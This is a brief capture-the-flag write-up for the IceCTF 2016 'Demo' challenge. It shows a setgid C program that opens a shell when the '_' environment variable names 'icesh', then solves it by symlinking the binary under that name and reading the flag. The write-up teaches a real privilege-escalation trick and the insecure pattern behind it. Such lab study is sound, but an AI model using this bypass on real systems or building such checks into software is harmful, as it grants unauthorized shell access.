IceCTF 2016 Demo writeup [pwn] [55pts]
·1 min
I did not see any writeup that use symlink to solve this, so I wrote one.
The code #
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <libgen.h>
#include <string.h>
void give_shell() {
gid_t gid = getegid();
setresgid(gid, gid, gid);
system("/bin/sh");
}
int main(int argc, char *argv[]) {
if(strncmp(basename(getenv("_")), "icesh", 6) == 0){
give_shell();
}
else {
printf("I'm sorry, your free trial has ended.\n");
}
return 0;
}
[ctf-35729@icectf-shell-2016 ~]$ /home/demo/demo
I'm sorry, your free trial has ended.
Solution #
[ctf-35729@icectf-shell-2016 ~]$ ln -s /home/demo/demo icesh
[ctf-35729@icectf-shell-2016 ~]$ ./icesh
$ cat /home/demo/flag.txt
IceCTF{wH0_WoU1d_3vr_7Ru5t_4rgV}
Yeah, just create a symlink because $_ in script or program will always return the executable name (correct me if I’m wrong)